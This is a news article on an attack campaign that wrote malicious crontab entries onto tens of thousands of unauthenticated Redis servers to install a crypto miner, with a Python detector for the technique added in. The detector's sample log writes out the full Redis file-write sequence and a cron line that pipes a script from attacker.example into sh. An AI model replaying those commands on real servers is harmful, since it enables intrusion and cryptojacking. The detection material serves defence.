An unknown attacker targeted tens of thousands of exposed, unauthenticated Redis servers on the Internet in an attempt to install a cryptocurrency miner on them.
It is not immediately clear how many of these hosts were successfully compromised. The attempt relied on a “lesser-known technique” for tricking the server into writing data to arbitrary files, an unauthorized-access method first documented in September 2018.
“The general idea behind this exploiting technique is to configure Redis to write its file-based database to a directory containing a method to authorize a user (such as adding a key to ‘.ssh/authorized_keys’), or start a process (like adding a script to ‘/etc/cron.d’),” Censys said in a new report.
The attack surface management platform said it discovered evidence (i.e., Redis commands) indicating the attacker’s efforts to store malicious crontab entries in the “/var/spool/cron/root” file, which would result in the execution of a shell script hosted on a remote server.
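The sequence described above leaves a recognizable trace in Redis’s own command stream: the client first redirects the dump location (`CONFIG SET dir` and `CONFIG SET dbfilename`) into a cron or `.ssh` directory and then forces a dump with `SAVE` or `BGSAVE`. The following detector, added here as an example and not part of the Censys report or the original article, walks `MONITOR`-style output and flags exactly that pattern per client. The `MONITOR` lines, the client addresses, the `attacker.example` host and the list of sensitive directories are all constructed for the example.

```python
import posixpath
import re
import shlex
from collections import defaultdict

# Directories where a Redis RDB dump becomes something another service trusts
# or executes: cron spool/drop-in directories and any .ssh directory. This list
# is an assumption for the example; extend it for your environment.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily")

# MONITOR prints: <unix time> [<db> <client addr>] "CMD" "arg" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')

# Constructed MONITOR output: one client redirecting the dump into the root
# crontab and saving, one benign client doing ordinary work. The payload and
# the attacker.example URL are placeholders, not captured data.
SAMPLE_MONITOR = r"""
1663000000.100000 [0 203.0.113.5:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1663000000.200000 [0 203.0.113.5:51234] "CONFIG" "SET" "dbfilename" "root"
1663000000.300000 [0 203.0.113.5:51234] "SET" "x" "\n*/1 * * * * curl -s http://attacker.example/s.sh | sh\n"
1663000000.400000 [0 203.0.113.5:51234] "SAVE"
1663000001.000000 [0 10.0.0.8:40001] "CONFIG" "SET" "dir" "/var/lib/redis"
1663000001.100000 [0 10.0.0.8:40001] "SET" "session:42" "abc"
1663000001.200000 [0 10.0.0.8:40001] "BGSAVE"
"""


def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address and argument list."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    ts, _db, client, rest = m.groups()
    return {"ts": float(ts), "client": client, "args": shlex.split(rest)}


def is_sensitive_dir(path):
    """True if an RDB written into `path` would land somewhere cron or sshd reads."""
    p = posixpath.normpath(path)
    if posixpath.basename(p) == ".ssh":
        return True
    return any(p == d or p.startswith(d + "/") for d in SENSITIVE_DIRS)


def detect_file_write_abuse(lines):
    """Track CONFIG SET dir/dbfilename per client and alert when that client
    triggers SAVE/BGSAVE with the dump pointed at a sensitive directory."""
    state = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for raw in lines:
        ev = parse_monitor_line(raw)
        if not ev or not ev["args"]:
            continue
        args, st = ev["args"], state[ev["client"]]
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            if args[2].lower() in ("dir", "dbfilename"):
                st[args[2].lower()] = args[3]
        elif cmd in ("SAVE", "BGSAVE") and is_sensitive_dir(st.get("dir", "")):
            alerts.append({
                "ts": ev["ts"],
                "client": ev["client"],
                "target": posixpath.join(posixpath.normpath(st["dir"]),
                                         st.get("dbfilename", "dump.rdb")),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_file_write_abuse(SAMPLE_MONITOR.splitlines()):
        print(f"{a['ts']:.0f} {a['client']} wrote RDB to {a['target']}")
```

Run against the sample, the detector reports a single alert for the client that pointed the dump at `/var/spool/cron/root`; the benign client that saved into `/var/lib/redis` produces nothing. Because the state is keyed by client address, a `CONFIG SET dir` from one connection followed by `SAVE` from another is not correlated, which is the main blind spot to be aware of when adapting this to real `MONITOR` or proxy logs.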
The shell script, which is still accessible, is designed to do the following:
- Kill processes related to security and system monitoring
- Delete log files and command histories
- Add a new SSH key (“backup1”) to the root user’s authorized_keys file to enable remote access
- Disable iptables firewalls
- Install scanning tools such as masscan, and
- Install and run the XMRig cryptocurrency mining application
The SSH key was said to have been set on 15,526 of the 31,239 unauthenticated Redis servers, suggesting the attack was attempted on “over 49% of known unauthenticated Redis servers on the Internet”.
However, one of the main reasons this attack might fail is that the Redis service needs to run with elevated privileges (for example, as root) for the adversary to be able to write to the cron directory in question.
“Although this can happen when running Redis inside a container (like Docker), where the process could see itself running as root and allow the attacker to write these files,” said the Censys researchers. “But in this case, only the container is affected, not the physical host.”
The Censys report also revealed that there are approximately 350,675 Internet-accessible Redis database services spanning 260,534 unique hosts.
“While most of these services require authentication, 11% (39,405) do not,” the company said, adding “out of a total of 39,405 unauthenticated Redis servers we observed, the potential data exposure is over 300 gigabytes”.
Top 10 countries with exposed and unauthenticated Redis services include China (20,011), United States (5,108), Germany (1,724), Singapore (1,236), India (876), France (807), Japan (711), Hong Kong (512), the Netherlands (433) and Ireland (390).
China also leads in terms of the amount of data exposed per country, amounting to 146 gigabytes of data, with the US coming in second with around 40 gigabytes.
Censys said it also found numerous instances of Redis services that were misconfigured, noting that “Israel is one of the only regions where the number of misconfigured Redis servers exceeds the number of correctly configured ones.”
To mitigate the threat, users are advised to enable client authentication, configure Redis to listen only on inward-facing network interfaces, prevent abuse of the CONFIG command by renaming it to something unguessable, and configure firewalls to accept Redis connections only from trusted hosts.